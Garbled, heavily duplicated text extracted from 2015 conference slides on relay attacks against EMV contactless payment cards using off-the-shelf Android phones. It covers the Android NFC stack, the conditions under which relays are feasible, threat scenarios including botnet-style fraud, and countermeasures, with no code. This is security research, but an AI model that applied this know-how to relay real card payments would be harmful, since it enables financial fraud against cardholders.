J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
